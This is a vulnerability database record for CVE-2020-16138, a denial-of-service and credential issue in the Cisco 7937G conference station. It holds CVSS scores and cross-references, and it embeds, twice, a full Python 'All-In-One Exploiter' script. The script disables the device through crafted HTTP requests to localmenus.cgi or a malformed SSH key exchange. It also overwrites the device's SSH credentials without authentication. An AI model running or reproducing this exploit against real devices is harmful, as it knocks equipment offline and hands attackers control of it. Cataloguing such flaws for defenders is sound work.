var-202008-0711
Vulnerability from variot
A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. Cisco 7937G is an online conference terminal equipment of Cisco (Cisco).
There are security vulnerabilities in Cisco 7937G version 1-4-4-0 to version 1-4-5-7. An attacker can use this vulnerability to cause a denial of service. # Exploit Title: Cisco 7937G All-In-One Exploiter
Date: 2020-08-10
Exploit Author: Cody Martin
Vendor Homepage: https://cisco.com
Version: <=SIP-1-4-5-7
Tested On: SIP-1-4-5-5, SIP-1-4-5-7
CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137
!/usr/bin/python
import sys import getopt import requests import paramiko import socket import os
def main(argv): target = "" attack = "" username = "" password = "" divider = "============================================="
help_text = '''
exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider)
if len(sys.argv) == 1:
print(help_text)
sys.exit(2)
try:
opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="])
except getopt.GetoptError:
print(help_text)
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print(help_text)
sys.exit()
elif opt in ("-t", "--target"):
target = arg
elif opt in ("-a", "--attack"):
attack = arg
elif opt in ("-u", "--user"):
username = arg
elif opt in ("-p", "--password"):
password = arg
if username != "" and password != "" and attack == "3":
print("Starting SSH attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password)
finished = attack_ssh(target, username, password)
elif attack == "1":
print("Starting DoS reset attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack)
finished = dos_one(target)
elif attack == "2":
print("Starting DoS non-reset attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack)
finished = dos_two(target)
print(divider)
if finished == 1:
print("DoS reset attack completed!")
elif finished == 2:
print("DoS non-reset attack completed!")
print("Device must be power cycled to restore functionality.")
elif finished == 3:
tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password)
connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target)
print(tell)
print("You must specify the key exchange when connecting or the device will be DoS'd!")
print(connection_example)
elif finished == 0:
print("Something strange happened. Attack likely unsuccessful.")
sys.exit()
def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1
return 0
def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.") sys.exit()
transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1",
"diffie-hellman-group14-sha1",
"diffie-hellman-group1-sha1"]})
fd = os.open("/dev/null", os.O_WRONLY)
savefd = os.dup(2)
os.dup2(fd, 2)
try:
transport.connect(username="notreal", password="notreal")
except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):
os.dup2(savefd, 2)
return 2
return 0
def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit()
r = requests.post(url=url, params=payload_pass, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()
except requests.exceptions.RequestException:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()
return 3
if name == "main": main(sys.argv[1:])
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202008-0711",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unified ip conference station 7937g",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.4.4.0"
},
{
"model": "unified ip conference station 7937g",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.4.5.7"
},
{
"model": "unified ip conference station 7937g",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "1-4-4-0 \u304b\u3089 1-4-5-7"
},
{
"model": "7937g",
"scope": "gte",
"trust": 0.6,
"vendor": "cisco",
"version": "1-4-4-0,\u003c=1-4-5-7"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-47312"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009442"
},
{
"db": "NVD",
"id": "CVE-2020-16138"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:unified_ip_conference_station_7937g_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009442"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cody Martin",
"sources": [
{
"db": "PACKETSTORM",
"id": "158817"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-368"
}
],
"trust": 0.7
},
"cve": "CVE-2020-16138",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-16138",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-009442",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-47312",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2020-16138",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-009442",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-16138",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-009442",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-47312",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202008-368",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-47312"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009442"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-368"
},
{
"db": "NVD",
"id": "CVE-2020-16138"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE\u2019s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. Cisco 7937G is an online conference terminal equipment of Cisco (Cisco). \n\r\n\r\nThere are security vulnerabilities in Cisco 7937G version 1-4-4-0 to version 1-4-5-7. An attacker can use this vulnerability to cause a denial of service. # Exploit Title: Cisco 7937G All-In-One Exploiter\n# Date: 2020-08-10\n# Exploit Author: Cody Martin\n# Vendor Homepage: https://cisco.com\n# Version: \u003c=SIP-1-4-5-7\n# Tested On: SIP-1-4-5-5, SIP-1-4-5-7\n# CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137\n#!/usr/bin/python\n\nimport sys\nimport getopt\nimport requests\nimport paramiko\nimport socket\nimport os\n\n\ndef main(argv):\n target = \"\"\n attack = \"\"\n username = \"\"\n password = \"\"\n divider = \"=============================================\"\n\n help_text = \u0027\u0027\u0027\nexploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password]\n%s\nExample: exploit.py -t 192.168.1.200 -a 1\nExample: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa\n%s\nAttack types:\n1: DoS with automatic device reset\n2: DoS without automatic device reset\n3: Change SSH credentials of target device\n\u0027\u0027\u0027 % (divider, divider)\n\n if len(sys.argv) == 1:\n print(help_text)\n sys.exit(2)\n try:\n opts, args = getopt.getopt(argv, \"ht:a:u:p:\", [\"help\", \"target=\", \"attack=\", \"user=\", \"password=\"])\n except getopt.GetoptError:\n print(help_text)\n sys.exit(2)\n for opt, arg in opts:\n if opt == \"-h\":\n print(help_text)\n sys.exit()\n elif opt in (\"-t\", \"--target\"):\n target = arg\n elif opt in (\"-a\", \"--attack\"):\n attack = arg\n elif opt in (\"-u\", \"--user\"):\n username = arg\n elif opt in (\"-p\", \"--password\"):\n password = arg\n\n if username != \"\" and password != \"\" and attack == \"3\":\n print(\"Starting SSH attack!\")\n print(divider)\n print(\"Target: \", target, \"\\nAttack: \", attack, \"\\nUser: \", username, \"\\nPassword: \", password)\n finished = attack_ssh(target, username, password)\n elif attack == \"1\":\n print(\"Starting DoS reset attack!\")\n print(divider)\n print(\"Target: \", target, \"\\nAttack: \", attack)\n finished = dos_one(target)\n elif attack == \"2\":\n print(\"Starting DoS non-reset attack!\")\n print(divider)\n print(\"Target: \", target, \"\\nAttack: \", attack)\n finished = dos_two(target)\n\n print(divider)\n\n if finished == 1:\n print(\"DoS reset attack completed!\")\n elif finished == 2:\n print(\"DoS non-reset attack completed!\")\n print(\"Device must be power cycled to restore functionality.\")\n elif finished == 3:\n tell = \"SSH attack finished!\\nTry to login using the supplied credentials %s:%s\" % (username, password)\n connection_example = \"ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s\" % (username, target)\n print(tell)\n print(\"You must specify the key exchange when connecting or the device will be DoS\u0027d!\")\n print(connection_example)\n elif finished == 0:\n print(\"Something strange happened. Attack likely unsuccessful.\")\n sys.exit()\n\n\ndef dos_one(target):\n url = \"http://%s/localmenus.cgi\" % target\n data = \"A\"*46\n payload = {\"func\": \"609\", \"data\": data, \"rphl\": \"1\"}\n print(\"FIRING ZE MIZZLES!\")\n for i in range(1000):\n try:\n r = requests.post(url=url, params=payload, timeout=5)\n if r.status_code != 200:\n print(\"Device doesn\u0027t appear to be functioning or web access is not enabled.\")\n sys.exit()\n except requests.exceptions.RequestException:\n return 1\n\n return 0\n\n\ndef dos_two(target):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(15)\n try:\n sock.connect((target, 22))\n except OSError:\n print(\"Device doesn\u0027t appear to be functioning (already DoS\u0027d?) or SSH is not enabled.\")\n sys.exit()\n\n transport = paramiko.Transport(sock=sock, disabled_algorithms={\"kex\": [\"diffie-hellman-group-exchange-sha1\",\n \"diffie-hellman-group14-sha1\",\n \"diffie-hellman-group1-sha1\"]})\n\n fd = os.open(\"/dev/null\", os.O_WRONLY)\n savefd = os.dup(2)\n os.dup2(fd, 2)\n\n try:\n transport.connect(username=\"notreal\", password=\"notreal\")\n except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):\n os.dup2(savefd, 2)\n return 2\n\n return 0\n\n\ndef attack_ssh(target, username, password):\n url = \"http://%s/localmenus.cgi\" % target\n payload_user = {\"func\": \"403\", \"set\": \"401\", \"name1\": username, \"name2\": username}\n payload_pass = {\"func\": \"403\", \"set\": \"402\", \"pwd1\": password, \"pwd2\": password}\n print(\"FIRING ZE MIZZLES!\")\n try:\n r = requests.post(url=url, params=payload_user, timeout=5)\n if r.status_code != 200:\n print(\"Device doesn\u0027t appear to be functioning or web access is not enabled.\")\n sys.exit()\n\n r = requests.post(url=url, params=payload_pass, timeout=5)\n if r.status_code != 200:\n print(\"Device doesn\u0027t appear to be functioning or web access is not enabled.\")\n sys.exit()\n except requests.exceptions.RequestException:\n print(\"Device doesn\u0027t appear to be functioning or web access is not enabled.\")\n sys.exit()\n\n return 3\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-16138"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009442"
},
{
"db": "CNVD",
"id": "CNVD-2020-47312"
},
{
"db": "PACKETSTORM",
"id": "158817"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-16138",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "158819",
"trust": 2.2
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009442",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-47312",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202008-368",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158817",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-47312"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009442"
},
{
"db": "PACKETSTORM",
"id": "158817"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-368"
},
{
"db": "NVD",
"id": "CVE-2020-16138"
}
]
},
"id": "VAR-202008-0711",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-47312"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-47312"
}
]
},
"last_update_date": "2024-11-23T22:16:20.887000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "End-of-Sale and End-of-Life Announcement for the Cisco Unified IP Conference Station 7937G",
"trust": 0.8,
"url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009442"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009442"
},
{
"db": "NVD",
"id": "CVE-2020-16138"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://packetstormsecurity.com/files/158819/cisco-7937g-denial-of-service.html"
},
{
"trust": 2.4,
"url": "https://www.blacklanternsecurity.com/2020-08-07-cisco-unified-ip-conference-station-7937g/"
},
{
"trust": 1.6,
"url": "https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16138"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16138"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16137"
},
{
"trust": 0.1,
"url": "https://cisco.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16139"
},
{
"trust": 0.1,
"url": "http://%s/localmenus.cgi\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-47312"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009442"
},
{
"db": "PACKETSTORM",
"id": "158817"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-368"
},
{
"db": "NVD",
"id": "CVE-2020-16138"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-47312"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009442"
},
{
"db": "PACKETSTORM",
"id": "158817"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-368"
},
{
"db": "NVD",
"id": "CVE-2020-16138"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-47312"
},
{
"date": "2020-11-05T09:23:10",
"db": "JVNDB",
"id": "JVNDB-2020-009442"
},
{
"date": "2020-08-10T19:02:33",
"db": "PACKETSTORM",
"id": "158817"
},
{
"date": "2020-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202008-368"
},
{
"date": "2020-08-12T21:15:12.063000",
"db": "NVD",
"id": "CVE-2020-16138"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-47312"
},
{
"date": "2020-11-05T09:23:10",
"db": "JVNDB",
"id": "JVNDB-2020-009442"
},
{
"date": "2020-08-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202008-368"
},
{
"date": "2024-11-21T05:06:50.017000",
"db": "NVD",
"id": "CVE-2020-16138"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202008-368"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco 7937G input validation error vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-47312"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-368"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202008-368"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.